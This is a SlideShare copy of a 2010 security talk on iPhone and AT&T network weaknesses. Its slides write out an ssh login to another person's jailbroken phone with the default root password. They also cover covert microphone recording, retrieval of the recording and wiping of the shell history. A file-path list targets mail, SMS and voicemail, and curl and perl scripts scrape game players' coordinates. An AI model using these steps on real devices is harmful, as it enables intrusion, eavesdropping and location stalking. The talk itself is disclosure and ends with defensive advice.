SlideShare a Scribd company logo

The New World of Smartphone Security

ā€¢
ā€¢
T
Trevor Hawthorn
TechnologyBusiness
1 of 110
Download to read offline
The New World of Smartphone Security What Your iPhone Disclosed About You Trevor Hawthorn Managing Partner Friday, July 9, 2010
Todayā€™s Talk ā€œPockets full of shellsā€ Friday, July 9, 2010
Todayā€™s Talk ā€œI can see you from my houseā€ Friday, July 9, 2010
Who I am now Friday, July 9, 2010
Old Smartphone Best Practices = Bad = Good Friday, July 9, 2010
New Smartphone Best Practices 1. IT will use the iPhone Conļ¬guration Utility so you can talk to Exchange, use the VPN, wireless, etc. 2. Get iFart, itā€™s hilarious. Friday, July 9, 2010
If AT&T is in attendance: Friday, July 9, 2010
If AT&T is in attendance: ā€¢ Facts about AT&T and me: Friday, July 9, 2010
If AT&T is in attendance: ā€¢ Facts about AT&T and me: ā€¢ I enjoy my AT&T wireless service Friday, July 9, 2010
If AT&T is in attendance: ā€¢ Facts about AT&T and me: ā€¢ I enjoy my AT&T wireless service ā€¢ Feel that I have fantastic coverage everywhere I go at all times Friday, July 9, 2010
If AT&T is in attendance: ā€¢ Facts about AT&T and me: ā€¢ I enjoy my AT&T wireless service ā€¢ Feel that I have fantastic coverage everywhere I go at all times ā€¢ Am sure you have the largest/fastest 3G network, regardless of what VZW says Friday, July 9, 2010
If AT&T is in attendance: ā€¢ Facts about AT&T and me: ā€¢ I enjoy my AT&T wireless service ā€¢ Feel that I have fantastic coverage everywhere I go at all times ā€¢ Am sure you have the largest/fastest 3G network, regardless of what VZW says ā€¢ Looking forward to years of receiving quality service from you Friday, July 9, 2010
If AT&T is in attendance: ā€¢ Facts about AT&T and me: ā€¢ I enjoy my AT&T wireless service ā€¢ Feel that I have fantastic coverage everywhere I go at all times ā€¢ Am sure you have the largest/fastest 3G network, regardless of what VZW says ā€¢ Looking forward to years of receiving quality service from you ā€¢ Would love to chat Friday, July 9, 2010
Jailbreaking blackra1n pwnagetool Friday, July 9, 2010
It opens up a whole new world of applications Friday, July 9, 2010
It opens up a whole new world of applications ā€¢ common Unix binaries Friday, July 9, 2010
It opens up a whole new world of applications ā€¢ common Unix binaries ā€¢ sshd Friday, July 9, 2010
It opens up a whole new world of applications ā€¢ common Unix binaries ā€¢ sshd ā€¢ tethering Friday, July 9, 2010
It opens up a whole new world of applications ā€¢ common Unix binaries ā€¢ sshd ā€¢ tethering ā€¢ pirate software Friday, July 9, 2010
It opens up a whole new world of applications ā€¢ common Unix binaries ā€¢ sshd ā€¢ tethering ā€¢ pirate software ā€¢ super easy to JB your phone Friday, July 9, 2010
Impact on security ā€œJail breaking removes 80% of the iPhoneā€™s security precautionsā€ Charlie Miller, SyScan 2009 Friday, July 9, 2010
How many iPhones are jailbroken? Friday, July 9, 2010
6.93% [1]http://www.slideshare.net/pinchmedia/piracy-on-the-appstore Friday, July 9, 2010
Global Stats Friday, July 9, 2010
ifconļ¬g root# ifconļ¬g lo0: ļ¬‚ags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384 inet 127.0.0.1 netmask 0xff000000 en0: ļ¬‚ags=8963<UP,BROADCAST,SMART,RUNNING,PROMISC,SIMPLEX,MULTICAST> mtu 1500 ether 00:21:e9:09:e3:4f pdp_ip0: ļ¬‚ags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450 inet 10.69.62.220 --> 10.69.62.220 netmask 0xffffffff pdp_ip1: ļ¬‚ags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450 pdp_ip2: ļ¬‚ags=8011<UP,POINTOPOINT,MULTICAST> mtu 1024 pdp_ip3: ļ¬‚ags=8011<UP,POINTOPOINT,MULTICAST> mtu 1024 en1: ļ¬‚ags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500 inet 192.168.20.1 netmask 0xffffff00 broadcast 192.168.20.255 ether 0a:0b:ad:0b:ab:e0 Friday, July 9, 2010
Interfaces Friday, July 9, 2010
Interfaces en0 = 802.11 interface Friday, July 9, 2010
Interfaces en0 = 802.11 interface pdp_ip0 = primary cellular interface on APN: wap.cingular Friday, July 9, 2010
Interfaces en0 = 802.11 interface pdp_ip0 = primary cellular interface on APN: wap.cingular pdp_ip1 = activates when retrieving visual voicemail on APN: acds.voicemail Friday, July 9, 2010
Interfaces en0 = 802.11 interface pdp_ip0 = primary cellular interface on APN: wap.cingular pdp_ip1 = activates when retrieving visual voicemail on APN: acds.voicemail pdp_ip2 = not sure Friday, July 9, 2010
Interfaces en0 = 802.11 interface pdp_ip0 = primary cellular interface on APN: wap.cingular pdp_ip1 = activates when retrieving visual voicemail on APN: acds.voicemail pdp_ip2 = not sure pdp_ip3 = used with tethering Friday, July 9, 2010
ifconļ¬g pdp_ip0: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450 inet 10.69.62.220 --> 10.69.62.220 netmask 0xffffffff Friday, July 9, 2010
sshd Friday, July 9, 2010
So what? Friday, July 9, 2010
Until (about) October 16, 2009 AT&T did not ļ¬lter device to device IP network trafļ¬c. Friday, July 9, 2010
AT&Tā€™s Network Most people think it looks like this: /32 Friday, July 9, 2010
AT&Tā€™s Network Actually, more like this: Multiple /16ā€™s Friday, July 9, 2010
Your smartphone (and laptop/ blackberry, etc.) has been on one giant flat network... Friday, July 9, 2010
So I started looking around... Friday, July 9, 2010
Friday, July 9, 2010
Friday, July 9, 2010
Devices On the Network 10,589* IPs scanned Count Port What? 83 22 sshd 24 80 http 4 2008 PDANet 3,644 62078 iPhone Default Friday, July 9, 2010
Other stuff out there ā€¢ Saw a Linux box with sshd ā€¢ Windows Mobile devices ā€¢ Blackberries ā€¢ Windows PCā€™s ā€¢ PDANet for the iPhone is an open proxy. Friday, July 9, 2010
Friday, July 9, 2010
ssh access between phones Trevors-iPhone:~ root# ssh root@10.69.62.100 Password: [alpine] Nates-iPhone:~ root# Nates-iPhone:~ root# id uid=0(root) gid=0(wheel) groups=0(wheel),1 (daemon),2(kmem),3(sys),4(tty),5(operator),8 (procview),9(procmod),20(staff),29 (certusers),80(admin) Friday, July 9, 2010
Filesystem Guide Interesting stuff: /private/var/mobile/Library/Mail - Email (IMAP Exchange, POP3, etc.) , /private/var/mobile/Library/SMS - SMS Text Messages /private/var/mobile/Library/Voicemail - Voicemail in .amr format /private/var/mobile/Library/AddressBook - Contacts /private/var/mobile/Library/CallHistory - Call History /private/var/mobile/Library/Notes - Notes Friday, July 9, 2010
/private/var/mobile/Library/CallHistory/call_history.db /private/var/mobile/Library/AddressBook/AddressBook.sqlitedb /private/var/mobile/Library/AddressBook/AddressbookImages.sqlitedb /private/var/mobile/Library/Cookies/Cookies.plist /private/var/mobile/Library/Keyboard/dynamic-text.dat /private/var/mobile/Library/Mail/Accounts.plist /private/var/mobile/Library/Mail/(mail account name)/Deleted Messages /private/var/mobile/Library/Mail/(mail account name)/Sent Messages /private/var/mobile/Library/Mail/(mail account name)/INBOX /private/var/mobile/Library/Maps/History.plist /private/var/mobile/Library/YouTube/Bookmarks.plist /private/var/mobile/Library/Voicemail/(amr ļ¬les) /private/var/mobile/Library/Voicemail/voicemail.db /private/var/mobile/Library/Safari/Bookmarks.plist /private/var/mobile/Library/Safari/History.plist /private/var/mobile/Library/Suspend.plist /private/var/mobile/Library/Safari/SuspendState.plist /private/var/mobile/Library/Safari/SMS/sms.db /private/var/mobile/Library/Preference/(various preference Plists) /private/var/mobile/Library/Notes/notes.db Friday, July 9, 2010
Letā€™s do a bit more Erica Utilities - cmd line utilities for the iPhone recAudio: Record audio from the recAudio onboard microphone. Queries the iPhoneā€™s GPS API to findme return latitude/longitude Friday, July 9, 2010
Attacker Victim recAudio scp/ssh recording.aiff 10.69.62.220 10.69.62.100 Friday, July 9, 2010
I can hear you typing Trevors-iPhone:~ root# scp bin/recAudio root@10.69.62.100: Password: recAudio 100% 19KB 1.3KB/s 00:00 Trevors-iPhone:~ root# ssh root@10.69.62.100 Password: Nates-iPhone:~ root# ./recAudio Start talking. Press ^C to finish. Starting recording ^C Interrupted. Stopping recording Friday, July 9, 2010
Nates-iPhone:~ root# ls -l *.aiff -rw-r--r-- 1 root wheel 43178 Oct 2 22:35 2009-10-92 at 22:35:04.aiff Nates-iPhone:~ root# mv 2009-10-92 at 22:35:04.aiff test.aiff Trevors-iPhone: root# scp root@10.69.62.100:~/*.aiff . Password: test.aiff 100% 523KB 2.2KB/ s 00:00 Nates-iPhone:~ root# rm test.aiff recAudio .bash_history Nates-iPhone:~ root# last wtmp begins at Fri Oct 2 22:41 Nates-iPhone:~ root# Friday, July 9, 2010
Other bad things Friday, July 9, 2010
Other bad things ā€¢ ./openURL tel://1-900-XXX-XXX Friday, July 9, 2010
Other bad things ā€¢ ./openURL tel://1-900-XXX-XXX ā€¢ ./openURL tel://911 or tel://mynumber Friday, July 9, 2010
Other bad things ā€¢ ./openURL tel://1-900-XXX-XXX ā€¢ ./openURL tel://911 or tel://mynumber ā€¢ Pillage ļ¬lesystem: email, sms, notes, app data, etc. Friday, July 9, 2010
Other bad things ā€¢ ./openURL tel://1-900-XXX-XXX ā€¢ ./openURL tel://911 or tel://mynumber ā€¢ Pillage ļ¬lesystem: email, sms, notes, app data, etc. ā€¢ apt-get install tcpdump nmap Friday, July 9, 2010
Other bad things ā€¢ ./openURL tel://1-900-XXX-XXX ā€¢ ./openURL tel://911 or tel://mynumber ā€¢ Pillage ļ¬lesystem: email, sms, notes, app data, etc. ā€¢ apt-get install tcpdump nmap ā€¢ go wild on whatever network en0 is connected to. Friday, July 9, 2010
Worms and Exploits Friday, July 9, 2010
Dutch Extortion November 2009 Friday, July 9, 2010
ikee Worm November 2009 Friday, July 9, 2010
Exploits ā€¢ Phone/Privacy.A* command line tool ā€¢ Phone/iBotNet.A* worm with C&C *Discovered by security ļ¬rm Intego Friday, July 9, 2010
Some good news Friday, July 9, 2010
Some good news ā€¢ AT&T does segment part of their network: Friday, July 9, 2010
Some good news ā€¢ AT&T does segment part of their network: ā€¢ e.g. I could not see friend in CA from DC Friday, July 9, 2010
Some good news ā€¢ AT&T does segment part of their network: ā€¢ e.g. I could not see friend in CA from DC ā€¢ But I could see friend in Boston Friday, July 9, 2010
Some good news ā€¢ AT&T does segment part of their network: ā€¢ e.g. I could not see friend in CA from DC ā€¢ But I could see friend in Boston ā€¢ No easy way to target speciļ¬c individual (Identity to AT&T NAT IP address not super easy) Friday, July 9, 2010
Some good news ā€¢ AT&T does segment part of their network: ā€¢ e.g. I could not see friend in CA from DC ā€¢ But I could see friend in Boston ā€¢ No easy way to target speciļ¬c individual (Identity to AT&T NAT IP address not super easy) ā€¢ No way to correlate 10.x.x.x IP to person via Safari Friday, July 9, 2010
Some good news ā€¢ AT&T does segment part of their network: ā€¢ e.g. I could not see friend in CA from DC ā€¢ But I could see friend in Boston ā€¢ No easy way to target speciļ¬c individual (Identity to AT&T NAT IP address not super easy) ā€¢ No way to correlate 10.x.x.x IP to person via Safari ā€¢ decloak.net doesnā€™t really work in Mobile Safari Friday, July 9, 2010
Some good news ā€¢ AT&T does segment part of their network: ā€¢ e.g. I could not see friend in CA from DC ā€¢ But I could see friend in Boston ā€¢ No easy way to target speciļ¬c individual (Identity to AT&T NAT IP address not super easy) ā€¢ No way to correlate 10.x.x.x IP to person via Safari ā€¢ decloak.net doesnā€™t really work in Mobile Safari ā€¢ Man this is slow... Friday, July 9, 2010
email to ID user <img src=ā€http://10.69.62.220/i.jpgā€> 10.69.63.220:80 10.69.63.110 src:10.69.63.110 10.69.63.220:80 10.69.63.110 dst:10.69.63.220 Friday, July 9, 2010
What to do ā€¢ Donā€™t Jailbreak your phone if you care about security (sorry) ā€¢ Change root and mobile usersā€™ passwords ā€¢ Attention Cydia Folks: Do not bind sshd to pdp interfaces; force password change upon install ā€¢ IT Folks: Policy on jailbroken iphones ā€¢ AT&T: Filter mobile to mobile IP trafļ¬c Friday, July 9, 2010
Privacy and Location Based Apps Friday, July 9, 2010
Location Based Apps Friday, July 9, 2010
Location Based Apps ā€¢ Underworld: Sweet Deal Friday, July 9, 2010
Location Based Apps ā€¢ Underworld: Sweet Deal ā€¢ Drug trafļ¬cking game with candy Friday, July 9, 2010
Location Based Apps ā€¢ Underworld: Sweet Deal ā€¢ Drug trafļ¬cking game with candy ā€¢ Location matters, move product from point A to point B Friday, July 9, 2010
Location Based Apps ā€¢ Underworld: Sweet Deal ā€¢ Drug trafļ¬cking game with candy ā€¢ Location matters, move product from point A to point B ā€¢ Phone sends high resolution coordinates to game server Friday, July 9, 2010
Like Druglords Friday, July 9, 2010
Underworld: Sweetdeal Friday, July 9, 2010
Google Maps Friday, July 9, 2010
Paros ā€¢ Client side proxy ā€¢ Conļ¬gure iPhone to use machine running Parosā€™s IP address as proxy ā€¢ Watch what your apps send and receive Friday, July 9, 2010
Request Friday, July 9, 2010
Response Friday, July 9, 2010
Used to monitor players Friday, July 9, 2010
Friday, July 9, 2010
Friday, July 9, 2010
Friday, July 9, 2010
Friday, July 9, 2010
Friday, July 9, 2010
Letā€™s pick a non-intel agency player chezk Friday, July 9, 2010
Request Friday, July 9, 2010
Response Friday, July 9, 2010
Lat/Lon to GMaps: Friday, July 9, 2010
County Records Friday, July 9, 2010
Facebook Friday, July 9, 2010
Ok neat, what else? Friday, July 9, 2010
Near real-time geolocation tracking of players Friday, July 9, 2010
cURL + perl + crontab = csv + gpsbabel = kml + Google Earth = EPIC screen shots Friday, July 9, 2010
curl script #/bin/sh # # First login... # curl -s -H "User-Agent: Underworld premium/1.4.0 CFNetwork/459 Darwin/ 10.0.0d3" -d @/home/trevor/iphone/login.xml --dump-header /home/ trevor/iphone/headers.txt http://game.dl.a-steroids.com/TrafficServer/ # # Then update location curl -s -H "User-Agent: Underworld premium/1.4.0 CFNetwork/459 Darwin/ 10.0.0d3" -b /home/trevor/iphone/headers.txt -d @/home/trevor/iphone/ update_loc.xml http://game.dl.a-steroids.com/TrafficServer/ # # Get GMap obhjects curl -s -H "User-Agent: Underworld premium/1.4.0 CFNetwork/459 Darwin/ 10.0.0d3" -b /home/trevor/iphone/headers.txt -d @/home/trevor/iphone/ gmap_update.xml http://game.dl.a-steroids.com/TrafficServer/ Friday, July 9, 2010
perl script #! /usr/bin/perl use strict; use warnings; # make single or multiline input into one scalar my $glob = join('',(<>)); # extract name-to-flag records my @records = $glob =~ /(<name>.*?</lon>)/ig; for (@records) { my ($name,$lat,$lon) = $_ =~ qr|<name>(.*?)</name>.*?<lat>([-d.]*)</lat><lon>([-d .]*)</lon>|i; print "$lat,$lon,$namen"; } Friday, July 9, 2010
perl script output 39.93220206723633,-77.47186584472656,poppyseed 38.13753356933594,-77.06847380591797,Gadsden 39.98429718017578,-78.30014190673828,Ziggety 39.23520812988281,-77.40483581542969,Lexi 39.855418395996094,-77.2717056274414,Tatu 39.55705801582031,-77.4004086303711,Bigfoot 36.67790985107422,-77.5902328491211,Jeneko 38.297552490234375,-77.65829467773438,Stilbored 39.891050720214844,-77.55879211025781,Timoteo 39.66313247680664,-78.04374694824219,Gamber 36.295310314697266,-78.14061126700984,UnderWear Friday, July 9, 2010
Friday, July 9, 2010
Friday, July 9, 2010
Friday, July 9, 2010
Friday, July 9, 2010
Friday, July 9, 2010
Friday, July 9, 2010
Friday, July 9, 2010
Friday, July 9, 2010
Comments/Feedback: trevor.hawthorn@stratumsecurity.com www.stratumsecurity.com Twitter: @packetwerks @stratumsecurity Special Thanks: Tiago Stock Friday, July 9, 2010

Recommended

MVC Demystified: Essence of Ruby on Rails
MVC Demystified: Essence of Ruby on RailsMVC Demystified: Essence of Ruby on Rails
MVC Demystified: Essence of Ruby on Railscodeinmotion
Ā 
Train Lighting System Seminor Presentation
Train Lighting System Seminor PresentationTrain Lighting System Seminor Presentation
Train Lighting System Seminor PresentationAkhil S
Ā 
Remote accident report system for highways using rf
Remote accident report system for highways using rfRemote accident report system for highways using rf
Remote accident report system for highways using rfPRADEEP Cheekatla
Ā 
Seminar ppt on digital signature
Seminar ppt on digital signatureSeminar ppt on digital signature
Seminar ppt on digital signaturejolly9293
Ā 
Mobile Web and Campus Assistant
Mobile Web and Campus AssistantMobile Web and Campus Assistant
Mobile Web and Campus Assistantshellac
Ā 
Craig Rispin Keynote at Sentis Neurosafety Summit 2013
Craig Rispin Keynote at Sentis Neurosafety Summit 2013Craig Rispin Keynote at Sentis Neurosafety Summit 2013
Craig Rispin Keynote at Sentis Neurosafety Summit 2013Craig Rispin
Ā 
Roomware - Trends - Hardware as commodity
Roomware - Trends - Hardware as commodityRoomware - Trends - Hardware as commodity
Roomware - Trends - Hardware as commodityguest8ce14f
Ā 
Room ware next_slideshare
Room ware next_slideshareRoom ware next_slideshare
Room ware next_slidesharePeter Kaptein
Ā 

Recommended

MVC Demystified: Essence of Ruby on Rails
MVC Demystified: Essence of Ruby on RailsMVC Demystified: Essence of Ruby on Rails
MVC Demystified: Essence of Ruby on Railscodeinmotion
Ā 
Train Lighting System Seminor Presentation
Train Lighting System Seminor PresentationTrain Lighting System Seminor Presentation
Train Lighting System Seminor PresentationAkhil S
Ā 
Remote accident report system for highways using rf
Remote accident report system for highways using rfRemote accident report system for highways using rf
Remote accident report system for highways using rfPRADEEP Cheekatla
Ā 
Seminar ppt on digital signature
Seminar ppt on digital signatureSeminar ppt on digital signature
Seminar ppt on digital signaturejolly9293
Ā 
Mobile Web and Campus Assistant
Mobile Web and Campus AssistantMobile Web and Campus Assistant
Mobile Web and Campus Assistantshellac
Ā 
Craig Rispin Keynote at Sentis Neurosafety Summit 2013
Craig Rispin Keynote at Sentis Neurosafety Summit 2013Craig Rispin Keynote at Sentis Neurosafety Summit 2013
Craig Rispin Keynote at Sentis Neurosafety Summit 2013Craig Rispin
Ā 
Roomware - Trends - Hardware as commodity
Roomware - Trends - Hardware as commodityRoomware - Trends - Hardware as commodity
Roomware - Trends - Hardware as commodityguest8ce14f
Ā 
Room ware next_slideshare
Room ware next_slideshareRoom ware next_slideshare
Room ware next_slidesharePeter Kaptein
Ā 
Snac - PluggedIn NYC011210
Snac - PluggedIn NYC011210Snac - PluggedIn NYC011210
Snac - PluggedIn NYC011210PluggedIn
Ā 
Phone gap nikolaionken-08-06
Phone gap nikolaionken-08-06Phone gap nikolaionken-08-06
Phone gap nikolaionken-08-06Skills Matter
Ā 
Mobile is Everyware
Mobile is EverywareMobile is Everyware
Mobile is EverywarePaul Golding
Ā 
OSMC2010 Open NMS Kickstart
OSMC2010 Open NMS KickstartOSMC2010 Open NMS Kickstart
OSMC2010 Open NMS KickstartRonny
Ā 
Creating New Interaction with the iPhone, Daniel Heffernan, Appschool
Creating New Interaction with the iPhone, Daniel Heffernan, AppschoolCreating New Interaction with the iPhone, Daniel Heffernan, Appschool
Creating New Interaction with the iPhone, Daniel Heffernan, Appschoolcatherinewall
Ā 
Uniting care hospital of the future - craig rispin
Uniting care hospital of the future - craig rispinUniting care hospital of the future - craig rispin
Uniting care hospital of the future - craig rispinCraig Rispin
Ā 
Mobile Monday Atlanta Aug10 2009
Mobile Monday Atlanta Aug10 2009Mobile Monday Atlanta Aug10 2009
Mobile Monday Atlanta Aug10 2009momocamp
Ā 
Advanced android
Advanced androidAdvanced android
Advanced androiddonnfelker
Ā 
Mobile Strategy & Product Dev. - iRush
Mobile Strategy & Product Dev. - iRushMobile Strategy & Product Dev. - iRush
Mobile Strategy & Product Dev. - iRushAndrew Donoho
Ā 
OpenStack Summit, A Community of Service Providers
OpenStack Summit, A Community of Service ProvidersOpenStack Summit, A Community of Service Providers
OpenStack Summit, A Community of Service ProvidersAndrew Shafer
Ā 
Alan Srbljanin NextGen 09
Alan Srbljanin NextGen 09Alan Srbljanin NextGen 09
Alan Srbljanin NextGen 09Marit Hendriks
Ā 
T-DOSE 2010 - Agile Enterprise, CLouds and Devops
T-DOSE 2010 - Agile Enterprise, CLouds and DevopsT-DOSE 2010 - Agile Enterprise, CLouds and Devops
T-DOSE 2010 - Agile Enterprise, CLouds and DevopsChef Software, Inc.
Ā 
The Mobile Experience Ecosystem - Towards Personal Mobile Information Archite...
The Mobile Experience Ecosystem - Towards Personal Mobile Information Archite...The Mobile Experience Ecosystem - Towards Personal Mobile Information Archite...
The Mobile Experience Ecosystem - Towards Personal Mobile Information Archite...Rod Farmer
Ā 
iPhone Apps - What, how, why?
iPhone Apps - What, how, why?iPhone Apps - What, how, why?
iPhone Apps - What, how, why?David Carr
Ā 
GTEC: Government as a Platform
GTEC: Government as a PlatformGTEC: Government as a Platform
GTEC: Government as a PlatformTim O'Reilly
Ā 
Mobile IA Talk for Oz-IA 2009
Mobile IA Talk for Oz-IA 2009Mobile IA Talk for Oz-IA 2009
Mobile IA Talk for Oz-IA 2009Oliver Weidlich
Ā 
Beyond 3G: Bringing Networks, Terminals and the Web Together
Beyond 3G: Bringing Networks, Terminals and the Web TogetherBeyond 3G: Bringing Networks, Terminals and the Web Together
Beyond 3G: Bringing Networks, Terminals and the Web TogetherMobileMonday Norway
Ā 
Look back
Look backLook back
Look backRamesh Kumar
Ā 
Innovation Challenges in the Wireless Broadband Eco-System
Innovation Challenges in the Wireless Broadband Eco-System Innovation Challenges in the Wireless Broadband Eco-System
Innovation Challenges in the Wireless Broadband Eco-System Dr. Mazlan Abbas
Ā 
The Megatrend of M2M - a View of the Year 2018 - Craig Rispin Keynote at - C...
The Megatrend of M2M - a View of the Year 2018 - Craig Rispin Keynote at - C...The Megatrend of M2M - a View of the Year 2018 - Craig Rispin Keynote at - C...
The Megatrend of M2M - a View of the Year 2018 - Craig Rispin Keynote at - C...Craig Rispin
Ā 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
Ā 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
Ā 

More Related Content

Similar to The New World of Smartphone Security

Snac - PluggedIn NYC011210
Snac - PluggedIn NYC011210Snac - PluggedIn NYC011210
Snac - PluggedIn NYC011210PluggedIn
Ā 
Phone gap nikolaionken-08-06
Phone gap nikolaionken-08-06Phone gap nikolaionken-08-06
Phone gap nikolaionken-08-06Skills Matter
Ā 
Mobile is Everyware
Mobile is EverywareMobile is Everyware
Mobile is EverywarePaul Golding
Ā 
OSMC2010 Open NMS Kickstart
OSMC2010 Open NMS KickstartOSMC2010 Open NMS Kickstart
OSMC2010 Open NMS KickstartRonny
Ā 
Creating New Interaction with the iPhone, Daniel Heffernan, Appschool
Creating New Interaction with the iPhone, Daniel Heffernan, AppschoolCreating New Interaction with the iPhone, Daniel Heffernan, Appschool
Creating New Interaction with the iPhone, Daniel Heffernan, Appschoolcatherinewall
Ā 
Uniting care hospital of the future - craig rispin
Uniting care hospital of the future - craig rispinUniting care hospital of the future - craig rispin
Uniting care hospital of the future - craig rispinCraig Rispin
Ā 
Mobile Monday Atlanta Aug10 2009
Mobile Monday Atlanta Aug10 2009Mobile Monday Atlanta Aug10 2009
Mobile Monday Atlanta Aug10 2009momocamp
Ā 
Advanced android
Advanced androidAdvanced android
Advanced androiddonnfelker
Ā 
Mobile Strategy & Product Dev. - iRush
Mobile Strategy & Product Dev. - iRushMobile Strategy & Product Dev. - iRush
Mobile Strategy & Product Dev. - iRushAndrew Donoho
Ā 
OpenStack Summit, A Community of Service Providers
OpenStack Summit, A Community of Service ProvidersOpenStack Summit, A Community of Service Providers
OpenStack Summit, A Community of Service ProvidersAndrew Shafer
Ā 
Alan Srbljanin NextGen 09
Alan Srbljanin NextGen 09Alan Srbljanin NextGen 09
Alan Srbljanin NextGen 09Marit Hendriks
Ā 
T-DOSE 2010 - Agile Enterprise, CLouds and Devops
T-DOSE 2010 - Agile Enterprise, CLouds and DevopsT-DOSE 2010 - Agile Enterprise, CLouds and Devops
T-DOSE 2010 - Agile Enterprise, CLouds and DevopsChef Software, Inc.
Ā 
The Mobile Experience Ecosystem - Towards Personal Mobile Information Archite...
The Mobile Experience Ecosystem - Towards Personal Mobile Information Archite...The Mobile Experience Ecosystem - Towards Personal Mobile Information Archite...
The Mobile Experience Ecosystem - Towards Personal Mobile Information Archite...Rod Farmer
Ā 
iPhone Apps - What, how, why?
iPhone Apps - What, how, why?iPhone Apps - What, how, why?
iPhone Apps - What, how, why?David Carr
Ā 
GTEC: Government as a Platform
GTEC: Government as a PlatformGTEC: Government as a Platform
GTEC: Government as a PlatformTim O'Reilly
Ā 
Mobile IA Talk for Oz-IA 2009
Mobile IA Talk for Oz-IA 2009Mobile IA Talk for Oz-IA 2009
Mobile IA Talk for Oz-IA 2009Oliver Weidlich
Ā 
Beyond 3G: Bringing Networks, Terminals and the Web Together
Beyond 3G: Bringing Networks, Terminals and the Web TogetherBeyond 3G: Bringing Networks, Terminals and the Web Together
Beyond 3G: Bringing Networks, Terminals and the Web TogetherMobileMonday Norway
Ā 
Innovation Challenges in the Wireless Broadband Eco-System
Innovation Challenges in the Wireless Broadband Eco-System Innovation Challenges in the Wireless Broadband Eco-System
Innovation Challenges in the Wireless Broadband Eco-System Dr. Mazlan Abbas
Ā 
The Megatrend of M2M - a View of the Year 2018 - Craig Rispin Keynote at - C...
The Megatrend of M2M - a View of the Year 2018 - Craig Rispin Keynote at - C...The Megatrend of M2M - a View of the Year 2018 - Craig Rispin Keynote at - C...
The Megatrend of M2M - a View of the Year 2018 - Craig Rispin Keynote at - C...Craig Rispin
Ā 

Similar to The New World of Smartphone Security (20)

Snac - PluggedIn NYC011210
Snac - PluggedIn NYC011210Snac - PluggedIn NYC011210
Snac - PluggedIn NYC011210
Ā 
Phone gap nikolaionken-08-06
Phone gap nikolaionken-08-06Phone gap nikolaionken-08-06
Phone gap nikolaionken-08-06
Ā 
Mobile is Everyware
Mobile is EverywareMobile is Everyware
Mobile is Everyware
Ā 
OSMC2010 Open NMS Kickstart
OSMC2010 Open NMS KickstartOSMC2010 Open NMS Kickstart
OSMC2010 Open NMS Kickstart
Ā 
Creating New Interaction with the iPhone, Daniel Heffernan, Appschool
Creating New Interaction with the iPhone, Daniel Heffernan, AppschoolCreating New Interaction with the iPhone, Daniel Heffernan, Appschool
Creating New Interaction with the iPhone, Daniel Heffernan, Appschool
Ā 
Uniting care hospital of the future - craig rispin
Uniting care hospital of the future - craig rispinUniting care hospital of the future - craig rispin
Uniting care hospital of the future - craig rispin
Ā 
Mobile Monday Atlanta Aug10 2009
Mobile Monday Atlanta Aug10 2009Mobile Monday Atlanta Aug10 2009
Mobile Monday Atlanta Aug10 2009
Ā 
Advanced android
Advanced androidAdvanced android
Advanced android
Ā 
Mobile Strategy & Product Dev. - iRush
Mobile Strategy & Product Dev. - iRushMobile Strategy & Product Dev. - iRush
Mobile Strategy & Product Dev. - iRush
Ā 
OpenStack Summit, A Community of Service Providers
OpenStack Summit, A Community of Service ProvidersOpenStack Summit, A Community of Service Providers
OpenStack Summit, A Community of Service Providers
Ā 
Alan Srbljanin NextGen 09
Alan Srbljanin NextGen 09Alan Srbljanin NextGen 09
Alan Srbljanin NextGen 09
Ā 
T-DOSE 2010 - Agile Enterprise, CLouds and Devops
T-DOSE 2010 - Agile Enterprise, CLouds and DevopsT-DOSE 2010 - Agile Enterprise, CLouds and Devops
T-DOSE 2010 - Agile Enterprise, CLouds and Devops
Ā 
The Mobile Experience Ecosystem - Towards Personal Mobile Information Archite...
The Mobile Experience Ecosystem - Towards Personal Mobile Information Archite...The Mobile Experience Ecosystem - Towards Personal Mobile Information Archite...
The Mobile Experience Ecosystem - Towards Personal Mobile Information Archite...
Ā 
iPhone Apps - What, how, why?
iPhone Apps - What, how, why?iPhone Apps - What, how, why?
iPhone Apps - What, how, why?
Ā 
GTEC: Government as a Platform
GTEC: Government as a PlatformGTEC: Government as a Platform
GTEC: Government as a Platform
Ā 
Mobile IA Talk for Oz-IA 2009
Mobile IA Talk for Oz-IA 2009Mobile IA Talk for Oz-IA 2009
Mobile IA Talk for Oz-IA 2009
Ā 
Beyond 3G: Bringing Networks, Terminals and the Web Together
Beyond 3G: Bringing Networks, Terminals and the Web TogetherBeyond 3G: Bringing Networks, Terminals and the Web Together
Beyond 3G: Bringing Networks, Terminals and the Web Together
Ā 
Look back
Look backLook back
Look back
Ā 
Innovation Challenges in the Wireless Broadband Eco-System
Innovation Challenges in the Wireless Broadband Eco-System Innovation Challenges in the Wireless Broadband Eco-System
Innovation Challenges in the Wireless Broadband Eco-System
Ā 
The Megatrend of M2M - a View of the Year 2018 - Craig Rispin Keynote at - C...
The Megatrend of M2M - a View of the Year 2018 - Craig Rispin Keynote at - C...The Megatrend of M2M - a View of the Year 2018 - Craig Rispin Keynote at - C...
The Megatrend of M2M - a View of the Year 2018 - Craig Rispin Keynote at - C...
Ā 

Recently uploaded

2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
Ā 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
Ā 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
Ā 
